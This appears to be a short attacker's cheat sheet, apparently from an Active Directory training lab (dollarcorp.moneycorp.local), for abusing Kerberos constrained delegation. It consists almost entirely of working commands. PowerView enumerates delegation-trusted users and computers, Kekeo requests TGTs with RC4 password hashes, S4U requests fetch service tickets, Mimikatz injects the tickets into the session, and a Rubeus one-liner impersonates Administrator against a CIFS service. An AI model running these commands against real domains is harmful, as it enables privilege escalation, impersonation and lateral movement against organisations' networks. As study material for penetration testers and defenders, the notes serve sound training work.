Enum Users with Contrained Delegation

. .\\PowerView_dev.ps1

Get-DomainUser -TrustedToAuth

Using Kekeo To Requst TGT


.\\kekeo.exe

tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f

Use TGT to get TGS

tgs::s4u

tgs::s4u /tgt:[email protected]_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:[email protected] /service:cifs /dcorp-mssql.dollarcorp.moneycorp.LOCAL

Inject Ticket in Current Session

. ..\\Invoke-Mimikatz.ps1

Invoke-Mimikatz -Command '"kerberos::ptt [email protected]@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Rubeus Way

.\\Rubeus.exe s4u /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt

Enum Computers with contrained Delegation

. .\\PowerView_dev.ps1

Get-DomainComputer -TrustedToAuth

Request TGT

.\\kekeo.exe

tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d